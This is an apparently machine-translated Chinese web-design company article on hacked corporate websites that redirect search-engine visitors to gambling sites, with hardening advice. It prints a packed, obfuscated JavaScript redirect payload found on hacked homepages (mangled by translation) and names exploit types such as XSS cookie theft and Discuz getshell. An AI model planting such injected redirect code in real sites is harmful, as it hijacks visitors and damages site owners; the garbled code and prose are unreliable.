如何应对企业网站恶意跳转到赌博网站

近日，公司内部一位纪录片同事表示，当大量广州建站公司客户在做百度推广时，网站首页点击后会自动跳转到彩票网站和赌博网站，让用户从百度搜索或推广广告空间进入网站后可以跳转，但直接进入网站时没有跳转。由此造成的用户流失导致访问量锐减、网站服务器资源浪费、推广费用浪费等。甚至可以说，在百度推广和搜狗推广的都是广告彩票公司，在网站建设行业引起轩然大波。

很多客户在回应这个问题的时候，会找广告主来补偿甚至追究责任。因此，我们的运营商需要关注并知道如何快速解决网站恶意跳转的问题。经过网络咨询和测试，广州网站建设公司于君网总结了以下经验：

首先分析网站被黑，跳转到赌博网站的原因

一般一个网站被黑，是因为服务器信息(服务器IP远程端口管理员账号密码、SSH端口、root账号密码)与包括FTP账号密码在内的网站信息对接被黑客知道，导致黑客植入木马或后门。

在整体安全监控中，asp网站和php网站都有木马，这意味着木马可以以php脚本木马、asp脚本木马和jsp脚本木马的形式存在。这些木马可以恶意篡改网站、上传、重命名、下载等管理员的高权限操作。网站被跳转的客户所采用的网站架构是php  mysql架构和jsp  mysql架构，大多使用开源程序，如dedecms、dream  weaving系统、phpcms系统、discuz系统等。

当我们知道一些代码的时候，难免会在网站首页看到一些恶意篡改代码。删除恶意代码后，我们可能会在几天内完全停止跳转，但一段时间后，我们又会被跳转。这是一个非常讨厌的临时解决方案。短时间后网站会再次跳转，很难甚至不可能完全消除网站漏洞。

通过观察一些客户网站的首页，首页代码中有一个加密的代码，根据搜索引擎的特点进行跳转。例如，通过百度搜索和360搜索，搜狗搜索人会直接跳到彩票和赌博网站。以下代码：

type='text/java  '

eval(function(p，a，c，k，e，d){e=function(c){return(c35？string  . FromCharCode(c  29): c  . ToString(36))}；if(！''.replace(/^/,string)){while(c-)d[e(c)]=k[c]| | e(c)；k=[function(e){ retun  d[e]}]；e=function(){ return  ' \ w  ' }；c=1；}；while(c-)if(k[c])p=p  . replace(new  RegExp(' b  ' e(c)' \ b  '，' g  ')，k[c])；返回p；}(' l[' \ e  \ c  \ 1 \ m  \ I  \ 8 \ n  \ 0 '][' \ 7 \ 4 \ 9 \ 0 \ 8 '](' h  \ 2 \ 1 \ 4 \ 9 \ 3 \ 0 \ j  \ 3 \ 8 \ d  \ 6 \ 0 \ 8 \ k  \ 0 \ 5 \ f  \ a  \ r  \ a  2 \ 1 \ 4 \ 9 \ 3 \ 0 \ 6 \ 2 \ 4 \ 1 \ d  \ 6 \ s  \ 0 \ 3 \ 2 \ q  \ 5 \ 5 \ 7，29，29，' x74 | x63 | x73 | X70 | x72 | x2f  | x22 | x77 | x65 | x69 | x61 | x2e  | x6f  | X3D  | x64 | x6a  | x3e  | x3c  | x6d  | x79 | x78 | window  | x75 | x6e  | x6c  | x38 | x3a  | x76 | x68 '。拆分(' | ')，0，{}))一旦受到攻击，百度搜索引擎会判断该网站是否受到攻击，然后在百度风险评估中心记录并标记该网站。百度网站安全中心提醒您，网站可能遭到黑客攻击，部分页面被非法篡改！红色表示百度风险。导致客户打开网站被百度直接拦截，如下图所示：

画

针对以上跳转攻击的特点，我司广州网站建设公司同意从手工代码方面进行审计，检测网站漏洞，网站后门木马清理，漏洞修复，xss获取管理员账号cookies，discuz拥有getshell漏洞，inject获取管理员漏洞，discuz上传绕过漏洞等。

二、修复并防止网站被恶意跳转

1.服务器目录的安全部署、管理员帐户密码的加密、数字的特殊符号要求、所有密码的大写字母和小写字母，以及向网站数据库分配公共权限帐户。

2.mysql数据库默认端口由3306改为61116，添加到端口安全策略中。不对外开放，外部IP无法连接数据库。只有本地127.0.0.1才能连接到数据库，以防止攻击者恶意猜测。

3.保护服务器的底层系统，包括远程端口登录的安全验证。

4.对网站代码进行全面的安全检查，包括定期升级网站程序源代码，修复补丁和网站漏洞。

广州网站建设公司处理网站跳转问题的方法有很多，以上只是解决问题的方法之一，所以作为网站建设公司，要对源代码进行优化调整，以保证后期网站不受影响，这就涉及到了源代码和网站版本的升级。

网页名称：如何应对企业网站恶意跳转到赌博网站
URL标题：https://www.cdcxhl.com/news/108953.html

成都网站建设公司_创新互联，为您提供关键词优化、动态网站、建站公司、App开发、微信公众号、定制网站

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联